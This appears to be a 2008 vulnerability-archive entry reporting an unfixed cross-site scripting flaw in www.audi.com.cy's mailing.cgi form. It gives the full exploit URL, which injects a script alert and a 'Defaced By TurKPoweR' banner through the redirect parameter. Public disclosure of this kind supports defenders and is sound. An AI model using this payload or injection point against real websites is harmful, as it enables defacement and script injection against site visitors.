Security researcher TurKPoweR, has submitted on 25/07/2008 a cross-site-scripting (XSS) vulnerability affecting www.audi.com.cy, which at the time of submission ranked 6179952 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 11/11/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 25/07/2008 |
Date published: 11/11/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: TurKPoweR |
Domain: www.audi.com.cy |
Category: XSS |
Pagerank: 6179952 |
URL: http://www.audi.com.cy/cgi-bin/mailing.cgi?Order_Brochure3=on&Order_Brochure3=on&Order_Brochure=on&O rder_Brochure=on&Order_Brochure=on&Order_Brochure=on&Order_Brochure=on&Order_Brochure=on&Order_Broch ure32=on&Order_Brochure33=on&Order_Brochure4=on&Order_Brochure34=on&Order_Brochure342=on&Order_Broch ure2=on&Testdrive_Request=No%20Testdrive&Title=Mr&Last_Name=111-222-1933email@address.tst&First_Name =111-222-1933email@address.tst&Job_Title=111-222-1933email@address.tst&Company=111-222-1933email@add ress.tst&Address=111-222-1933email@address.tst&City=111-222-1933email@address.tst&Postal_Code=111-22 2-1933email@address.tst&District=111-222-1933email@address.tst&Country=111-222-1933email@address.tst &Home_Tel=111-222-1933email@address.tst&Work_Tel=111-222-1933email@address.tst&Fax=111-222-1933email @address.tst&Email_Address=111-222-1933email@address.tst&Type_of_Request=General%20Information&Model =111-222-1933email@address.tst&Year_Acquired=111-222-1933email@address.tst&Registration_Number=111-2 22-1933email@address.tst&Message_or_Request=111-222-1933email@address.tst&submit=Submit&redirect=="> <script>alert('HACKED%20By%20TurKPoweR')</script><marquee><h1>Defaced%20By%20TurKPoweR</h1></marquee > |
Click here to view the mirror
|
|
|